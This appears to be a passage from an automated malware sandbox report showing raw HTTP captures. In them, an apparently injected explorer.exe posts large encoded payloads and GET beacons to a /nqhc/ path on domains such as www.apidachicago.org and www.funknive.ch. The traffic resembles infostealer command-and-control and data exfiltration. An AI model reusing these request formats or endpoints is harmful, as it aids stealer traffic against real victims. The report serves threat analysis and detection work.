                                                                                                                                                                                    Data Ascii: r4txB=394x0pdxA_61dAjG4NEDBiCopMzf1HRSIJYxz4HWku8DrcsepM3dRATw8Bp8Ml1VCUv-0gRDHMULgD1qtWSqd8YaUb(hLl1qd_ISJ4oQm7Oky0ADrD6b~L6vd-oqsiRXltSTGUAMwauilu5l(LwjV-dOmhJCOVI6fiUtLoG8kpxgwM7b8xPnQo~RmytslTq79_oBA2K6fDV8Hemd4EtrzK7r0btOzC5YaCKRF0ELgs6zE0dSpXk3gDnmtCLAN_1kFSwmBINeq8Gkwb9EsuyaLzIWa4hyXca-9_eWq3XqoKJK8urspl2rt-PLBTSmDK43R0wK7R8uJgyAHOpVN_nwmoPPyAEdryb_(f7saijjLEPJ~WaeXuFsAP5RFhS93_X7PrrIaS5PyZHN8zECp886S7A7ZjCZa2YJFaZ6Q6~1f2fYz5dm5M9EDezf7rqJoAxiPXgNcaUvzH2RzwXWcRnSkbSz6_VtW9~Vkz5IFHtOp7U6ODZfNFd37_ng8IbE1B0JCb7Hk2E.
                                                                                                                                                                                    Nov 21, 2022 19:22:14.268018961 CET1017INHTTP/1.1 403 Forbidden
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:22:14 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Nov 21, 2022 19:22:14.268090963 CET1017INData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72
                                                                                                                                                                                    Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                    Nov 21, 2022 19:22:14.268141985 CET1017INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    37192.168.11.2049862194.245.148.18980C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:22:16.295747995 CET1021OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.apidachicago.org
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 51815
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.apidachicago.org
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.apidachicago.org/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 33 39 34 78 30 70 64 78 41 5f 36 31 64 41 6a 47 34 4e 45 44 42 69 43 6f 70 4d 7a 66 31 48 52 53 49 4a 59 78 7a 34 48 57 6b 76 45 44 71 75 30 65 6f 71 28 64 51 41 54 77 78 68 70 39 4d 6c 31 79 43 56 48 36 30 67 55 2d 48 4f 63 4c 67 51 68 71 74 45 71 71 4e 4d 59 5a 59 37 28 76 50 6c 30 78 64 5f 55 47 4a 37 55 41 6d 71 36 6b 7a 32 59 44 36 41 6a 4e 77 37 36 54 64 2d 6f 6d 6e 43 52 6c 6c 74 58 65 47 55 4d 4d 77 59 71 69 6b 64 42 6c 73 4d 6b 6a 42 65 64 4e 73 42 4a 64 55 6c 49 35 66 6a 30 35 4c 6f 48 44 6b 71 39 67 77 4c 50 62 75 6d 6a 6b 52 49 7e 52 34 69 74 76 7a 54 58 38 39 5f 63 5a 41 33 7e 36 66 41 56 38 45 2d 6d 64 70 56 74 71 33 71 37 68 77 62 74 6a 33 43 31 41 61 43 32 46 46 77 55 4c 67 34 71 7a 46 46 64 53 36 47 6b 33 74 44 6e 6b 7a 43 4b 45 48 66 31 6f 46 53 67 4c 42 4d 78 4f 71 37 7e 6b 69 76 70 45 71 4c 47 56 4d 54 49 55 66 34 67 36 54 63 65 69 39 2d 75 4b 71 33 58 41 6f 4c 4e 4b 38 65 62 73 6f 6b 32 6b 75 75 50 4d 4a 7a 54 79 4d 71 30 74 52 30 74 48 37 51 45 2d 4a 68 32 41 48 75 70 56 62 4d 28 33 78 6f 50 32 74 51 45 4c 6c 53 62 6f 28 66 32 4e 61 6e 53 65 4c 33 37 4a 34 6d 4b 65 51 2d 45 36 45 76 35 56 65 52 53 42 6d 76 58 37 50 72 6e 36 61 53 6c 50 79 6f 76 4e 39 45 67 43 76 74 38 36 42 72 41 39 5a 6a 43 49 61 7a 42 33 46 61 52 6c 51 36 75 62 66 77 76 59 7a 6f 4e 6d 36 4e 39 44 54 2d 7a 65 28 72 71 65 32 77 39 31 50 58 38 46 63 61 45 5f 77 33 4b 52 31 45 37 57 59 52 6e 52 69 37 53 34 39 5f 56 37 48 74 7a 4b 6b 33 52 79 46 45 78 65 70 38 41 36 4f 48 6f 4c 56 55 4d 67 6e 50 37 4f 79 59 50 33 32 58 6b 4a 47 5a 50 35 34 54 30 57 64 47 70 41 28 73 31 52 76 71 38 36 47 5f 31 69 74 79 6a 30 58 45 52 7a 64 4a 41 55 6a 63 71 79 79 4c 69 41 5a 70 68 61 69 42 41 41 37 76 71 71 44 64 48 43 4b 4a 4b 58 4e 37 6e 32 4c 6c 55 42 42 45 54 50 63 67 61 31 51 32 36 57 56 6f 7a 53 64 38 57 76 6e 64 5a 54 70 4e 6b 62 69 61 4a 4a 57 77 48 72 53 4a 62 73 43 74 37 4d 6a 38 34 79 42 63 53 6f 68 34 37 33 41 48 50 54 4e 38 72 78 59 42 66 31 56 6c 5a 79 68 4e 72 6a 59 56 59 5a 41 6e 7e 38 72 54 31 45 75 67 54 6f 53 67 76 58 73 5f 42 53 6f 74 68 48 4e 41 4d 76 47 68 58 39 6e 33 59 72 58 30 65 67 45 58 4a 6b 75 5f 4c 6d 39 73 6b 56 6f 73 61 72 4f 6e 77 36 44 52 79 77 78 78 70 59 46 50 61 44 38 67 34 52 6d 33 6b 39 58 53 59 39 55 5a 42 6b 6a 34 68 43 6f 73 51 76 6e 47 44 77 4c 70 42 4b 72 5f 49 31 28 67 65 4e 6e 7a 31 32 30 45 52 68 77 46 44 49 74 46 65 71 33 6c 31 43 33 50 45 53 78 61 31 6e 34 68 76 72 74 4a 32 37 6d 64 53 4f 6f 62 62 38 39 4f 59 75 31 46 6c 33 39 6f 44 4d 54 33 41 65 28 64 54 68 48 66 52 70 6e 30 47 37 53 63 4b 74 32 46 36 79 58 62 64 58 45 64 42 6b 28 32 30 35 7e 6e 65 64 6c 50 6c 61 5a 4f 4f 6b 54 62 28 51 39 4d 51 4b 63 4a 58 78 39 57 64 4c 53 47 38 69 37 2d 4a 4c 30 70 42 41 6a 6a 73 67 70 32 66 7a 67 4c 67 73 58 32 64 7a 62 78 44 37 33 62 53 37 77 6b 4d 6d 47 31 59 66 75 38 73 57 33 61 7a 71 32 49 4e 59 4d 64 4c 35 4b 41 34 65 6c 57 49 69 6e 57 32 30 78 67 51 66 39 4d 69 38 33 79 56 5f 7e 2d 63 71 43 43 78 46 48 74 4d 36 41 6d 71 50 6c 48 4f 39 63 5a 34 4f 6f 4e 7e 6b 64 54 42 4e 7a 74 35 79 4c 6e 6a 71 77 51 6b 56 52 73 69 54 42 45 47 45 68 6e 44 4e 58 4e 31 66 70 33 54 70 6f 73 78 53 74 56 31 65 34 32 52 31 5a 55 55 70 32 50 28 44 35 70 4d 66 5a 41 63 46 68 36 44 6e 71 33 48 4a 35 48 38 33 47 32 77 54 51 6b 7e 48 72 76 4b 52 44 31 55 30 36 68 75 76 77 6c 7e 57 63 78 64 79 33 49 50 5a 7e 44 52 48 75 55 49 75 6b 38 32 38 4b 31 65 69 44 75 58 56 70 33 53 6c 4a 45 4f 31 39 35 6a 77 65 6b 6c 47 4f 44 74 66 48 6e 7a 34 44 56 30 67 44 6c 52 32 51 42 6a 57 56 4d 5a 67 47 7a 76 44 53 55 43 4e 33 39 4e 33 51 4a 53 78 64 43 74 45 5a 75 39 4d 61 47 42 57 70 54 4e 50 45 50 61 34 63 59 59 57 48 32 6a 32 72 41 69 66 4f 4d 55 32 71 65 7a 67 4d 73 72 73 53 6d 74 48 7e 34 4c 68 6e 33 43 42 57 36 70 72 32 53 48 4e 53 4d 44 78 56 33 56 51 43 35 4c 6b 45 6f 51 45 4f 50 65 56 66 51 6b 39 65 35 65 54 41 70 54 65 44 39 38 6d 33 38 30 44 47 5f 4c 37 37 6f 36 77 4e 74 6c 54 79 38 6a 44 72 77 32 6f 70 5a 6a 50 4a 32 39 67 52 57 46 43 30 55 45 64 67 48 67 5f 7a 79 63 5f 65 39 59 74 68 72 4e 56 61 37 28 55 59 75 61 6d 58
                                                                                                                                                                                    Data Ascii: r4txB=394x0pdxA_61dAjG4NEDBiCopMzf1HRSIJYxz4HWkvEDqu0eoq(dQATwxhp9Ml1yCVH60gU-HOcLgQhqtEqqNMYZY7(vPl0xd_UGJ7UAmq6kz2YD6AjNw76Td-omnCRlltXeGUMMwYqikdBlsMkjBedNsBJdUlI5fj05LoHDkq9gwLPbumjkRI~R4itvzTX89_cZA3~6fAV8E-mdpVtq3q7hwbtj3C1AaC2FFwULg4qzFFdS6Gk3tDnkzCKEHf1oFSgLBMxOq7~kivpEqLGVMTIUf4g6Tcei9-uKq3XAoLNK8ebsok2kuuPMJzTyMq0tR0tH7QE-Jh2AHupVbM(3xoP2tQELlSbo(f2NanSeL37J4mKeQ-E6Ev5VeRSBmvX7Prn6aSlPyovN9EgCvt86BrA9ZjCIazB3FaRlQ6ubfwvYzoNm6N9DT-ze(rqe2w91PX8FcaE_w3KR1E7WYRnRi7S49_V7HtzKk3RyFExep8A6OHoLVUMgnP7OyYP32XkJGZP54T0WdGpA(s1Rvq86G_1ityj0XERzdJAUjcqyyLiAZphaiBAA7vqqDdHCKJKXN7n2LlUBBETPcga1Q26WVozSd8WvndZTpNkbiaJJWwHrSJbsCt7Mj84yBcSoh473AHPTN8rxYBf1VlZyhNrjYVYZAn~8rT1EugToSgvXs_BSothHNAMvGhX9n3YrX0egEXJku_Lm9skVosarOnw6DRywxxpYFPaD8g4Rm3k9XSY9UZBkj4hCosQvnGDwLpBKr_I1(geNnz120ERhwFDItFeq3l1C3PESxa1n4hvrtJ27mdSOobb89OYu1Fl39oDMT3Ae(dThHfRpn0G7ScKt2F6yXbdXEdBk(205~nedlPlaZOOkTb(Q9MQKcJXx9WdLSG8i7-JL0pBAjjsgp2fzgLgsX2dzbxD73bS7wkMmG1Yfu8sW3azq2INYMdL5KA4elWIinW20xgQf9Mi83yV_~-cqCCxFHtM6AmqPlHO9cZ4OoN~kdTBNzt5yLnjqwQkVRsiTBEGEhnDNXN1fp3TposxStV1e42R1ZUUp2P(D5pMfZAcFh6Dnq3HJ5H83G2wTQk~HrvKRD1U06huvwl~Wcxdy3IPZ~DRHuUIuk828K1eiDuXVp3SlJEO195jweklGODtfHnz4DV0gDlR2QBjWVMZgGzvDSUCN39N3QJSxdCtEZu9MaGBWpTNPEPa4cYYWH2j2rAifOMU2qezgMsrsSmtH~4Lhn3CBW6pr2SHNSMDxV3VQC5LkEoQEOPeVfQk9e5eTApTeD98m380DG_L77o6wNtlTy8jDrw2opZjPJ29gRWFC0UEdgHg_zyc_e9YthrNVa7(UYuamXPNAEQNrp0LZLjzqhk4edvZkY9AROUdXRfAqCiF7hKmGjLPKT2akT64cBzI3yT~l87fMlGKM8Fscf8lPh0ih4JvGMs4PueBQQcF5PNDjXgjsnBgsmBbR6YdzBXdhIc2JN3252OWKdEOP2dwT7UOiuLIT2l6Czln1QGE8qDR1EkaHZ0RSVlSlk9IA3c4XBtVH(m5ZhJUYKzCGjn2Zx2DseBsBJGFq(McaInz1sE2Op0CG(5j8S8Dc7qiq2ErgbI59wXxs(MANRe3o2wJsFyB1KifVSVLX0DeZ0_b8DLtm(DovUZmxWi7a4idHJxTWSkT-dAwHmRbNNJeu4xoM3bqERalQNawn5Rj3kBDqqROnCzfAubWsvpJETxOJZS6x9_ATvIBS~NZSZkxg3_d-QFeaiF8vmeYc9AAgdqHxTZ8A9QF5kS4kOe1Jsl8xelmTXiHC7RApZUxhIOQpm4KAEPhBOp7MIKmZlqhU0BsUVwEkFdaA50khYQ(Bk9BqQNv_BByw10F-ycykW5LOBwxt5iBB6hmPsNGWhDIXRxNqgPsIHFR0fnzYckRqy6uQ155Zlgfq8ZFG4eJ_IZtMcvABj3c_ZgMPYLr_z3qisdR9SbBNXpPb1DYzd3WQg0aSTnHqvNys(Hp6w7cKYEftgTlMUyrqI5b2XKF6H8nBeBfshFI9u692rIqHCEqMKTuBzAQvpWOACf~p8iHCFuT9xf(aIKpHfDhkB1WKEB6SzuMlX1I8dDDblh4e1Bdx2NfADeZmqqNVOju0qfMHC-IbPnK2R1xYfnBl~ECNFN5HQyLBHTXV5DcbgdjXfS1bHFngF_r5C1ILhzUnSmkF~ROvPO4C6q4KlKL3Q5li7ET_48e11Fcvbp~ONPdR9-3O0HkAT4r5E30ARB7nMoSRB1KUDX4PH7Ub5KmwHf31yQoMNef74mAH3T7HfSGnK_LQle6u1Cr8ubqT5wA5mXRZzzlrK1PTyogfaB5B2Ugcf8laa8TGIY9k9yoj1SkIcGUzl5PtqcNGDmkUE2bgWa~v8YG3UxeS8JmPvFyAo5mS(O1JX1ilGLM99OqKZe3xLsmAFZQ0NpSI6BWOtZaFSQ81SLFwufwsnZkkQjyE1pHZALwlQwlEW5HKavVD4GnTGWmv9i1LV3cS(37Vuq76NRvdQ0cAmWlFjoSRkEIlzNxeCUKPod~YDJf7oy5KO0(AAGAqDpLRS-QiP-DvdzgecTAiNLR3wPP2PUqh6JTbe7GskADzias5vx1EcNoCCxZr0tx1jP(aShIqcFbRxwIgAUPLKB1sZiswuiB3GNGB4s7oM50E~vim(5Ek9NPMUIV0nrGqiXJNPTKtOZWjtkajIJQ5CNK5FT0KA_msc9rdR6V_Q0PgwYgPee34XLDrfe1PLCYKOBgSpBjpeUetL4gJVnsNYGOZP7Xmpz23h584D2ntherFMzfmvc8wHmHhBwVdD-YbFzgCwga0HqR8jQadFtmql2ufIvmYRmX74DjH6N4AWS4pyc2M9wpVja92Fa(l9FfnJ253fMNrRSAJHFk_GvT1G_XkUOKLQKxgo7c5z3nH~UDXvTVX(38kSOYl4dEZOUNkAsMm8sg7GT07bKK1n2HALgW3KdvLolHLLbK9tS4KDZcIgY0rBeD17Z9UqUBV0xeGlm3tn7DmQLFd(9nFsCOcBiewxvoq8rvivw61e_dgDEUO7UW3CoT2aL78OaKIuWMChOdghUXxRsyM5j6KtngtetfHSRhHtSlAwZV-Dx8MfCiqSac1TGCLGL5zccO2wbnwae8niWOmNDCH57PzKp4UI8v-KUnZkTcTlZfQHV7G3KNbNFfWypTrQ_gqYrze81~Hu9MaKq(rswPRNsvyjFdgY5h9DVE-sS~_xGMhKn8ugRTCI1nkUdlfTIxNWlpROw1UZqYDLmpt73UsUdJRwZIDmpH5JjQc3Yc4FmdM8co0zMwo0zWpTeZRUGIf9jDum1CjWizHiXsnTlBrBfbk8B9YUFfk39GlaA(xY_vwj0X0hT8K3BQs9K7g18NATdxYhmpi4c(cefhQhfklRP22U3Ou6WSSXmH27nG3~MLfDHCfltSO6CzkwVE0PV
                                                                                                                                                                                    Nov 21, 2022 19:22:16.295847893 CET1030OUTData Raw: 70 38 4f 7a 5a 75 5a 6d 31 58 68 45 4a 4c 69 57 65 73 7e 59 6c 4e 53 4a 6f 35 39 51 34 4e 74 37 4b 73 6e 72 62 71 74 43 28 73 74 75 73 58 74 66 69 53 32 4e 44 35 70 73 44 50 4e 72 35 49 57 75 59 64 62 7a 6f 64 58 74 61 41 28 6b 32 54 62 54 52 36
                                                                                                                                                                                    Data Ascii: p8OzZuZm1XhEJLiWes~YlNSJo59Q4Nt7KsnrbqtC(stusXtfiS2ND5psDPNr5IWuYdbzodXtaA(k2TbTR6xkZLhEYUyCBPySrzcOmE83tNpOHvv1jcYz8jKgYuYRRwDAIGY2ICjhkoB6QNLD9g~QSKFwEJepDCOY4yDrDo1SbN2qbh66MwMBz-jPNTqJJIjc9ft9J4GY038ClYesaDlwDJGFhimkctZfj_bn6RMD4cAZC6frj06
                                                                                                                                                                                    Nov 21, 2022 19:22:16.313777924 CET1031OUTData Raw: 53 61 75 59 7e 61 67 49 6a 52 41 46 6f 79 76 53 6b 44 6a 76 43 61 37 59 65 6e 4b 71 32 67 4a 61 64 46 46 66 7e 38 35 67 39 6c 77 42 4c 35 53 4e 38 36 39 41 43 44 51 38 57 31 6a 6f 72 37 35 75 63 44 44 61 59 6f 66 7a 50 6b 38 59 61 52 6a 6c 70 68
                                                                                                                                                                                    Data Ascii: SauY~agIjRAFoyvSkDjvCa7YenKq2gJadFFf~85g9lwBL5SN869ACDQ8W1jor75ucDDaYofzPk8YaRjlphJvE1rNf1JszRS016(QtuxqIGeh(iPxfypLMNraG00Ig8kxLaC_lcx6kVwywCHzkldLpBXGhMU7zSGwnHp0godC1CKrXuDArV4jHQckfCYFtEDFjzBtJ13RhpeNYd(be0frw5Y8oJF2NRMu5JWjdlIKRY84R6wp0Nw
                                                                                                                                                                                    Nov 21, 2022 19:22:16.313836098 CET1033OUTData Raw: 77 72 59 6a 4c 73 28 76 37 65 63 6e 72 74 35 49 6a 69 7e 6a 62 72 7e 67 76 44 37 47 59 61 7e 58 47 54 72 4c 48 78 6c 75 63 42 62 61 33 39 74 4a 4a 62 34 6c 74 58 46 47 44 4e 49 77 32 6a 4e 4a 46 74 70 57 64 65 6a 4b 41 72 58 79 32 55 6b 66 41 63
                                                                                                                                                                                    Data Ascii: wrYjLs(v7ecnrt5Iji~jbr~gvD7GYa~XGTrLHxlucBba39tJJb4ltXFGDNIw2jNJFtpWdejKArXy2UkfAcIqYjmsJ-2zpYNVJ-CCGjULmYLZEQ(02Djkher2Cuf1waMXf93hL-8JmpskTTkpr6JqsBf7qH52xduDXYxk2tqOZwyofP(OC5VtIeQ7orAxikqF6WQPRanICZGGrcldOaU2iJiize~4ptazLa4AebqZuOpLu2hB8yK
                                                                                                                                                                                    Nov 21, 2022 19:22:16.313900948 CET1035OUTData Raw: 6d 4c 61 46 65 45 55 78 44 49 41 62 43 32 58 43 49 6d 35 57 4b 51 70 59 5a 4d 30 6f 47 6b 67 53 63 50 4c 48 73 33 79 6b 42 47 4f 5f 6d 67 74 55 41 4b 64 51 74 5a 71 33 62 70 33 59 56 4b 36 6e 51 77 76 44 66 4d 6a 33 4a 67 47 30 4b 55 63 6f 54 67
                                                                                                                                                                                    Data Ascii: mLaFeEUxDIAbC2XCIm5WKQpYZM0oGkgScPLHs3ykBGO_mgtUAKdQtZq3bp3YVK6nQwvDfMj3JgG0KUcoTgx1371nVBNwx2Lg89CzSQI7wj(qxnRHrh~tLYZv28MVwgXtUMzOnZZNdiGbxRee9fVaa5bCdNq8MIWd4BM6M6KyttOl8nI6yAw3GnGA1163fB6iLOHNlKhqLNVxU4XznidyYYrWPpztytVcShnS7zP5jECdvmUIbGV
                                                                                                                                                                                    Nov 21, 2022 19:22:16.314121008 CET1037OUTData Raw: 77 39 53 77 4d 41 56 63 77 33 6c 67 7e 73 6f 61 43 49 45 66 52 73 73 55 47 58 57 30 4a 78 51 49 56 5a 6f 55 55 69 51 50 36 7a 30 78 68 6e 54 71 61 50 76 6a 67 78 53 35 45 51 31 67 55 69 4c 48 69 47 46 68 31 77 70 57 45 41 4e 4f 72 6c 45 2d 41 6d
                                                                                                                                                                                    Data Ascii: w9SwMAVcw3lg~soaCIEfRssUGXW0JxQIVZoUUiQP6z0xhnTqaPvjgxS5EQ1gUiLHiGFh1wpWEANOrlE-AmVv8LgCZAPr8y~6p0FO2VOMtFyG79IzANT6sUPHtqz3wR76aJF1dnzGcKoQaX82chorbYeqEtCR4eGBwdjoS2rBly0KGZmxGsjtWs3r7_2MRjpjJ19FLDNGml6P(cwPQ8kpJTblO3G0TXeP9anZtl0pqkGIUZNgBx7
                                                                                                                                                                                    Nov 21, 2022 19:22:16.314280987 CET1048OUTData Raw: 53 51 64 56 7a 44 70 41 55 41 70 75 33 50 6c 4d 73 31 57 4f 4b 63 4e 4e 66 31 55 4e 74 62 53 4a 66 31 66 5f 6a 5a 70 39 35 5a 4d 53 35 41 35 58 4b 34 53 45 51 59 4e 35 51 41 30 30 66 63 39 49 45 74 56 61 75 39 67 45 39 42 64 69 51 77 41 53 4d 2d
                                                                                                                                                                                    Data Ascii: SQdVzDpAUApu3PlMs1WOKcNNf1UNtbSJf1f_jZp95ZMS5A5XK4SEQYN5QA00fc9IEtVau9gE9BdiQwASM-uZg6EtxiTecEDRky56wrK0WUZyUlXUsDh1NnIBjS~jHkCXyOIdzN9vcwOdj_SqQOkuD2yk4TUwIk9qad(Aih9_gMeiaPACUI62ADYBCG7ZDprdY9DsSXgrv5xqpRuClIhqs_FpMQRMLF7jcqUXYqxV(9OGgj5OO2Z
                                                                                                                                                                                    Nov 21, 2022 19:22:16.314448118 CET1053OUTData Raw: 78 4d 41 70 4a 36 35 48 71 39 73 72 39 42 47 38 4f 6e 63 6f 33 39 47 57 79 6f 7a 67 56 32 75 68 61 47 43 45 41 56 54 47 62 6f 31 6d 78 55 49 64 65 4f 63 48 6b 63 36 75 79 70 46 53 6d 6e 41 76 55 4e 61 6c 70 42 47 30 37 68 36 42 66 6c 35 4f 38 48
                                                                                                                                                                                    Data Ascii: xMApJ65Hq9sr9BG8Onco39GWyozgV2uhaGCEAVTGbo1mxUIdeOcHkc6uypFSmnAvUNalpBG07h6Bfl5O8HG6yu(Bn9Nfl7~Gno3wteMIaOlIT30O5H6t~0h4FAm6e0PcdgAlyeVEXTSwPLf9fgOWTmycmEzAVtFL06rEAhxbvGH-FtgMwYMZ120TSrFlEeJxxituZy6EHawPJtrBnkELZIv5XRjWnyZZNAkjRwkFJLTwqsiOi52
                                                                                                                                                                                    Nov 21, 2022 19:22:16.314635038 CET1056OUTData Raw: 47 70 6f 6e 7a 37 48 54 41 4f 6e 32 59 70 64 37 75 42 49 4b 43 31 58 72 33 67 4a 37 59 6f 50 6c 4e 59 42 76 34 55 6b 74 56 71 44 47 34 6a 28 4b 31 65 52 4b 48 33 72 64 6d 4a 47 4a 57 72 54 33 41 42 6a 51 6b 67 69 2d 56 45 4a 35 34 41 42 59 67 4c
                                                                                                                                                                                    Data Ascii: Gponz7HTAOn2Ypd7uBIKC1Xr3gJ7YoPlNYBv4UktVqDG4j(K1eRKH3rdmJGJWrT3ABjQkgi-VEJ54ABYgLrOoAMtlIqympMK2bWDS9lwQNalEhyeK9Nn1Lb4BEcX(pHcH7O52HGyQ4oZhiDA7fw76dHvCdqyA_DtOmwHtyL2C_lHl1pxKc~ZSElmL2A_2xlOs9UbWbaKWGPs(ahG1ojsDD29p_L9IrduYjmE39AEI-6Fudc-JCv
                                                                                                                                                                                    Nov 21, 2022 19:22:16.332362890 CET1061OUTData Raw: 75 31 35 50 4a 76 34 69 63 30 5a 33 75 68 47 5a 50 58 50 5a 58 57 67 57 59 72 38 66 6f 62 46 75 71 43 56 66 4d 75 62 45 6d 33 43 65 79 4b 5a 41 32 6d 38 64 56 44 58 43 58 70 42 63 4c 4f 31 76 6c 72 37 54 54 36 28 52 46 5a 4a 56 68 34 4c 31 73 38
                                                                                                                                                                                    Data Ascii: u15PJv4ic0Z3uhGZPXPZXWgWYr8fobFuqCVfMubEm3CeyKZA2m8dVDXCXpBcLO1vlr7TT6(RFZJVh4L1s815l4nSHHWcow5R6xzhaS2dhS7eX0Yu3gGcM5szy1AfWf8Vcus4dObAOEc6GRDEwQJjIkn3ow7-3hHI38lWVF0C2kYoezJYW_VFhCeiwL~amGg5457mWD0F1pHT9o6bVfWtoC~pDeYFg4pqBtyXFP1tn6lHvRzeqER
                                                                                                                                                                                    Nov 21, 2022 19:22:16.332454920 CET1069OUTData Raw: 49 71 7a 7a 6c 4d 6f 42 54 47 32 32 58 77 68 52 7a 66 32 74 64 38 34 38 31 7a 69 68 48 41 57 52 50 4d 53 66 76 6f 4b 76 57 6e 63 79 41 58 76 58 67 32 5a 51 4a 58 66 7a 79 62 34 37 61 52 42 4e 4a 73 62 4e 76 73 50 34 30 36 47 51 28 73 71 55 63 64
                                                                                                                                                                                    Data Ascii: IqzzlMoBTG22XwhRzf2td8481zihHAWRPMSfvoKvWncyAXvXg2ZQJXfzyb47aRBNJsbNvsP406GQ(sqUcdkR1b1EtyR-HNVIAnl0AmUvikezsz8lgmPyig73sjoeMcnh982BYkA_rob5BH1t~KHnNooL2sSxg0QhTQsIoa8aDflH6FYf3BColkrPKZ7Ex1oEul(xibD1kK4-aLcjUtobC-xIAwy68bZtzhCiqZ0vIKSFYnuzQhW
                                                                                                                                                                                    Nov 21, 2022 19:22:16.351340055 CET1070INHTTP/1.1 403 Forbidden
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:22:16 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Nov 21, 2022 19:22:16.351399899 CET1070INData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72
                                                                                                                                                                                    Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                    Nov 21, 2022 19:22:16.351445913 CET1071INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    38192.168.11.2049863194.245.148.18980C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:22:18.340101004 CET1071OUTGET /nqhc/?r4txB=6/QR3dlMV8DnDzXq/IQFMQKijd2A7lxAIJkdxNKkhe40n6kgsPq7UgH72h9AXiRjRkbt4wliAP55gS4vzkyfbvVcBKnLGlwpJg==&1b=S8jD HTTP/1.1
                                                                                                                                                                                    Host: www.apidachicago.org
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:22:18.359204054 CET1072INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:22:18 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Content-Length: 1840
                                                                                                                                                                                    Last-Modified: Tue, 04 Apr 2017 13:56:46 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    ETag: "58e3a61e-730"
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Nov 21, 2022 19:22:18.359293938 CET1073INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74
                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> ... The above 3 meta
                                                                                                                                                                                    Nov 21, 2022 19:22:18.359318018 CET1073INData Raw: 63 63 65 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 6f 6b 65 72 2e 63 6f 6d 2f 3f 70 6b 5f 63 61 6d 70 61 69 67 6e 3d 50 61 72 6b 69 6e 67 26 70 6b 5f 6b 77 64 3d 74 65 78 74 22 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 3e 4a 4f 4b
                                                                                                                                                                                    Data Ascii: ccess" href="https://joker.com/?pk_campaign=Parking&pk_kwd=text" role="button">JOKER.COM</a></p> </div> <footer class="footer"> <p>&copy; 2017 CSL GmbH / JOKER.COM</p> </footer> </div> ... /container -->


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    39192.168.11.2049864185.101.158.23980C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:22:23.422699928 CET1075OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.funknive.ch
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.funknive.ch
